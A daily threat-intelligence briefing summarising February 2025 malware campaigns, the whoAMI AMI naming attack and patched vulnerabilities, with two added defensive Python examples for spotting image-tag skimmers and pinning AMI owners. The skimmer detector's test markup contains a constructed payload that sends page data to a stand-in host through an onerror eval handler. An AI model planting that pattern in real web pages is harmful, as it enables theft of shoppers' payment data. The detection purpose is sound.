Cyware Daily Threat Intelligence, February 13, 2025

Daily Threat Briefing • Feb 13, 2025
Cybercriminals aren’t just after your data; they want full control of your device, and they’re getting better at it. The new BTMOB RAT is spreading through phishing sites disguised as streaming services and crypto platforms. This upgraded version of SpySolr RAT goes beyond basic spying and leverages Android’s Accessibility Service.
Hackers never forget old exploits. Attackers are ramping up efforts to exploit vulnerabilities from 2022 and 2023, targeting unpatched ThinkPHP and ownCloud systems. Researchers have tracked nearly 600 unique IPs abusing these flaws, proving that even years-old vulnerabilities remain dangerous if left unresolved.
Kimsuky is turning fake error messages into a weapon. Inspired by ClickFix campaigns, the North Korean APT has been pushing info-stealers through deceptive pop-ups, tricking victims into running malicious PowerShell commands. Masquerading as a South Korean official, the group lures targets into downloading malware under the guise of document registration.
New Ratatouille malware bypasses UAC
A newly identified malware called Ratatouille (or I2PRAT) is causing concern due to its clever ways of bypassing UAC and using I2P for anonymous communications. The malware spreads through phishing emails or fake CAPTCHA pages. When a victim runs an embedded PowerShell script, a loader is activated, using advanced techniques to raise privileges and evade defenses. Although it initially abused a Windows RPC mechanism, recent security patches have forced it to switch to other methods, such as process migration.
Android RAT spreads via phishing sites
A new Android RAT called BTMOB RAT has been discovered, targeting users through phishing sites. This malware is an upgraded version of SpySolr RAT, focusing on remote control, credential theft, and data exfiltration, posing a serious risk to Android users. BTMOB RAT is spread mainly through fake sites mimicking popular services, like iNat TV and bogus cryptocurrency platforms. A malicious APK named lnat-tv-pro.apk was found on the phishing site hxxps://tvipguncelpro[.]com/. The malware features live screen sharing, file management, audio recording, keylogging, and credential theft via web injections, utilizing Android’s Accessibility Service for control.
MageCart hidden in <img> tag
A MageCart attack was identified on a Magento-based eCommerce site, where malicious JavaScript was embedded within an HTML <img> tag. The script, hidden in a Base64-encoded image path, activated during checkout to steal credit card details and transmit them to a remote server. Attackers leveraged the “onerror” event handler to execute the script when the image failed to load, making detection difficult. This technique bypassed security measures and remained unnoticed by users.
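One way to hunt for this pattern in page markup, as an added example that is not part of the briefing or the researchers' tooling: it flags <img> tags that carry an onerror handler, and separately flags base64 "image" paths whose decoded bytes look like script rather than a real image format. The sample HTML and the stand-in payload are constructed here; the collector.example host is a placeholder.

```python
import base64
import re
from html.parser import HTMLParser

# Tokens marking decoded "image" bytes as script; real images start with a format magic instead.
JS_MARKERS = re.compile(rb"document\.|fetch\(|XMLHttpRequest|addEventListener|atob\(|eval\(")
IMAGE_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"GIF8", b"RIFF", b"<svg")

def decode_data_uri(src):
    """Return the decoded bytes of a base64 data: URI, or None if src is not one."""
    m = re.match(r"data:[^;,]*;base64,(.*)$", src or "", re.S)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1))
    except (ValueError, TypeError):
        return None

class ImgAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # one dict per suspicious <img>

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        reasons = []
        if "onerror" in a:
            reasons.append("onerror handler on <img>")
        payload = decode_data_uri(a.get("src"))
        if payload is not None and not payload.startswith(IMAGE_MAGIC) and JS_MARKERS.search(payload):
            reasons.append("base64 src decodes to script, not image data")
        if reasons:
            self.findings.append({"src": (a.get("src") or "")[:48], "reasons": reasons})

def audit_html(html):
    p = ImgAuditor()
    p.feed(html)
    return p.findings

# Constructed sample checkout markup (not the real skimmer): a normal logo, a genuine
# base64 PNG, and an <img> whose src is Base64 JavaScript run by its onerror handler.
FAKE_SCRIPT = b"fetch('https://collector.example/c?d=' + document.title)"
SAMPLE_HTML = (
    '<img src="/media/logo.png" alt="logo">'
    '<img src="data:image/png;base64,iVBORw0KGgo=" alt="pixel">'
    '<img src="data:image/png;base64,' + base64.b64encode(FAKE_SCRIPT).decode() + '"'
    ' onerror="eval(atob(this.src.split(\',\')[1]))">'
)
```

Only the third tag is reported, with both reasons; the genuine PNG data URI is left alone because its decoded bytes start with the PNG magic.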
Beware of this “whoAMI name confusion attack”
A new security issue, called the whoAMI name confusion attack, has been identified concerning Amazon Machine Images (AMIs), putting users and organizations at risk. This vulnerability allows attackers to create fake virtual machine images under deceptive names, leading users to mistakenly use these malicious images in their AWS setups.
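The defender-side fix for this class of confusion is to never select an AMI by name alone. The following added example (not Cyware's or AWS's code) runs a name-only lookup and an owner-restricted lookup over a constructed stand-in for a DescribeImages response; the account IDs, AMI IDs and dates are made up.

```python
from datetime import datetime
from fnmatch import fnmatch

# Constructed stand-in for an EC2 DescribeImages response. Account IDs, AMI IDs and
# dates are made up; the second entry models a look-alike published by an untrusted account
# with a newer CreationDate, which is what a "most recent by name" lookup will choose.
IMAGES = [
    {"ImageId": "ami-0000000000000001", "OwnerId": "111111111111", "Public": True,
     "Name": "ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-20250101",
     "CreationDate": "2025-01-01T00:00:00.000Z"},
    {"ImageId": "ami-0000000000000002", "OwnerId": "999999999999", "Public": True,
     "Name": "ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-20250212",
     "CreationDate": "2025-02-12T00:00:00.000Z"},
]
UBUNTU_PATTERN = "ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*"

def newest(images):
    """Return the image with the latest CreationDate, or None for an empty list."""
    if not images:
        return None
    return max(images, key=lambda i: datetime.strptime(i["CreationDate"], "%Y-%m-%dT%H:%M:%S.%fZ"))

def pick_ami_unsafe(images, name_pattern):
    """Name-only lookup, the pattern behind the name-confusion scenario: any account that
    publishes a public AMI matching the pattern can win by having the newest date."""
    return newest([i for i in images if fnmatch(i["Name"], name_pattern)])

def pick_ami(images, name_pattern, trusted_owners):
    """Hardened lookup: the name pattern is only trusted inside an explicit owner allow-list.
    With boto3 the same constraint is the Owners=[...] argument to ec2.describe_images()."""
    if not trusted_owners:
        raise ValueError("refusing AMI lookup without an owner allow-list")
    return newest([i for i in images
                   if i["OwnerId"] in trusted_owners and fnmatch(i["Name"], name_pattern)])
```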
Stable channel update patches Chrome
Google has launched Chrome version 133.0.6943.98/.99 for Windows and Mac, and 133.0.6943.98 for Linux, addressing four serious security vulnerabilities. These issues could let attackers run harmful code or access sensitive information. Users are urged to update their browsers right away. The update will be available over the next few days and weeks, fixing vulnerabilities in key parts of Chrome like the V8 JavaScript engine and the Browser UI. One major fix addresses CVE-2025-0995, a critical issue in V8, which could allow code execution that compromises user security.
Rise in ThinkPHP bug exploitation attempts
Increased hacker activity has been observed targeting poorly maintained devices vulnerable to security issues from 2022 and 2023. GreyNoise reported that attackers are exploiting two critical vulnerabilities: CVE-2022-47945, affecting the ThinkPHP Framework, and CVE-2023-49103, related to the ownCloud file-sharing solution. CVE-2022-47945 allows unauthenticated remote attackers to execute arbitrary commands. Researchers witnessed 572 unique IPs attempting to abuse this bug. CVE-2023-49103, linked to a third-party library, has also been actively targeted since its disclosure.
Kimsuky gets inspired by ClickFix campaigns
North Korean state actor Kimsuky has begun using a new tactic influenced by ClickFix campaigns, which distribute info-stealers through misleading error messages. These prompts trick victims into executing harmful code via PowerShell, leading to malware infections. The attacker pretends to be a South Korean official, gaining the victim’s trust before sending a spear-phishing email with a PDF attachment. To read the document, victims are sent to a fake registration link that instructs them to run PowerShell and enter the provided code. This code installs a remote desktop tool, giving the attacker access for data theft.